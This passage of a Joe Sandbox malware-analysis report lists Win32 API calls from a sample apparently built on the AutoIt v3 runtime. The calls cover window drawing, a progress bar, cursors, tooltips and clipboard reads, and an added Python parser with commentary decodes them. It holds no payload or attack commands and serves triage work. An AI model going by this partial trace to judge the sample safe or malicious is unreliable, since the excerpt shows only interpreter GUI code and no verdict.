                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                                                  • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 69173610-0
                                                                                                                                                                  • Opcode ID: 365d04d24795c841fcdc701f8413be148c47fe6b32405cf858c48fdb14120b33
                                                                                                                                                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                                                  • Opcode Fuzzy Hash: 365d04d24795c841fcdc701f8413be148c47fe6b32405cf858c48fdb14120b33
                                                                                                                                                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                                  • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                  • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                  • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
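                                                                                                                                                                   The API block above for the function at 0x4590F2 is a plain-text call trace, and the useful facts in it (which window classes are created, which window messages are sent, what the progress-bar parameters are) have to be read out of raw hex arguments. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses listings in this format and decodes those values. The 22 API lines are embedded verbatim as the input; the constant names (WS_*, WM_SETFONT, PBM_SETRANGE, PBM_SETSTEP, SPI_GETWORKAREA, DEFAULT_GUI_FONT, LOGPIXELSY, SW_SHOWNOACTIVATE) are the documented Win32 values. One assumption is built in: the plugin's argument columns are heuristic (an unresolved "?" shifts dwStyle between the fourth and fifth slot across the four CreateWindowExW lines), so the decoder finds dwStyle by its WS_POPUP/WS_CHILD bits rather than by position.

```python
"""Parse a Joe Sandbox IDA-plugin API listing and decode the Win32 calls.

Added example, not part of the report or the sample. SAMPLE_LISTING is the
API block of the function at 0x4590F2, copied verbatim; constant names are
the documented Win32 values. The plugin's argument columns are heuristic
(an unresolved "?" can shift a parameter by one slot), so dwStyle is found
by its bit pattern rather than by position.
"""
import re
from dataclasses import dataclass
from typing import Optional

SAMPLE_LISTING = """\
• DestroyWindow.USER32(?), ref: 004590F2
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
• CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
• GetClientRect.USER32(00000000,?), ref: 0045924E
• CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
• GetStockObject.GDI32(00000011), ref: 004592AC
• SelectObject.GDI32(00000000,00000000), ref: 004592B4
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
• DeleteDC.GDI32(00000000), ref: 004592D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
• GetStockObject.GDI32(00000011), ref: 004593D3
• SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
"""

API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function\s+(?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

MESSAGES = {0x000E: "WM_GETTEXTLENGTH", 0x0030: "WM_SETFONT", 0x0401: "PBM_SETRANGE",
            0x0402: "PBM_SETPOS", 0x0404: "PBM_SETSTEP", 0x0405: "PBM_STEPIT"}
WS_FLAGS = [(0x80000000, "WS_POPUP"), (0x40000000, "WS_CHILD"), (0x10000000, "WS_VISIBLE"),
            (0x08000000, "WS_DISABLED"), (0x00C00000, "WS_CAPTION")]
NAMED_ARGS = {  # (api, argument index) -> {value: constant name}
    ("SystemParametersInfoW", 0): {0x30: "SPI_GETWORKAREA"},
    ("GetStockObject", 0): {0x11: "DEFAULT_GUI_FONT"},
    ("GetDeviceCaps", 1): {0x5A: "LOGPIXELSY"},
    ("ShowWindow", 1): {0x04: "SW_SHOWNOACTIVATE"},
    ("SendMessageW", 1): MESSAGES}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                     # raw tokens: 8-digit hex, inline string, or "?" (unresolved)
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # set for "Part of subcall function" lines


def as_int(tok):
    return int(tok, 16) if HEX8.match(tok) else None


def parse_listing(text):
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as "APIs" or "Strings"
        raw = m["args"].strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_style(style):
    """Return (WS_* names, leftover class-specific bits such as PBS_SMOOTH)."""
    names = [n for bits, n in WS_FLAGS if (style & bits) == bits]
    mask = sum(bits for bits, n in WS_FLAGS if (style & bits) == bits)
    return names, style & ~mask


def summarise(calls):
    out = {"apis": sorted({c.name for c in calls}), "windows": [], "decoded": [],
           "strings": [], "progress_range": None, "progress_step": None}
    for c in calls:
        ints = [as_int(a) for a in c.args]
        for tok, val in zip(c.args, ints):          # inline strings the plugin resolved
            if val is None and tok != "?" and tok not in out["strings"]:
                out["strings"].append(tok)
        if c.name == "CreateWindowExW" and len(c.args) >= 5:
            # class name is slot 1; dwStyle is the first value in slots 3-4 carrying WS_POPUP/WS_CHILD
            style = next((v for v in ints[3:5] if v is not None and v & 0xC0000000), None)
            names, extra = decode_style(style) if style is not None else ([], 0)
            out["windows"].append({"class": c.args[1], "style": names, "class_style_bits": extra})
        for (api, idx), table in NAMED_ARGS.items():
            if c.name == api and len(ints) > idx and ints[idx] in table:
                out["decoded"].append((c.ref, api, table[ints[idx]]))
        if c.name == "SendMessageW" and len(ints) >= 4:
            if ints[1] == 0x0401 and ints[3] is not None:  # PBM_SETRANGE: lParam = MAKELPARAM(low, high)
                out["progress_range"] = (ints[3] & 0xFFFF, ints[3] >> 16)
            elif ints[1] == 0x0404:                         # PBM_SETSTEP: wParam = step size
                out["progress_step"] = ints[2]
    return out
```

                                                                                                                                                                   Run on the listing, summarise() recovers exactly the four strings the report lists under String ID (AutoIt v3, DISPLAY, msctls_progress32, static), a topmost popup created with WS_POPUP|WS_DISABLED|WS_CAPTION, two static controls and one msctls_progress32 child (the leftover style bit 0x1 on that control is PBS_SMOOTH), PBM_SETRANGE with lParam 0x00640000 decoding to a 0..100 range, and a PBM_SETSTEP of 1. A percentage progress bar in a window named "AutoIt v3" is what the AutoIt v3 runtime's own progress window looks like, which is an inference from these strings rather than a statement in the report; the practical value is that such functions can be triaged as interpreter code rather than payload.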
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor$Load
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1675784387-0
                                                                                                                                                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1582027408-0
                                                                                                                                                                  • Opcode ID: 641c283377bf90580b0f33fdf55f369ee1c61e001cb7cbed706b0c86a5b2892e
                                                                                                                                                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                                                  • Opcode Fuzzy Hash: 641c283377bf90580b0f33fdf55f369ee1c61e001cb7cbed706b0c86a5b2892e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                                  • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                                  • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                  • String ID: ($,$tooltips_class32
                                                                                                                                                                  • API String ID: 225202481-3320066284
                                                                                                                                                                  • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                  • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                                  • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                  • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 15083398-0
                                                                                                                                                                  • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                  • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                  • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                                  APIs
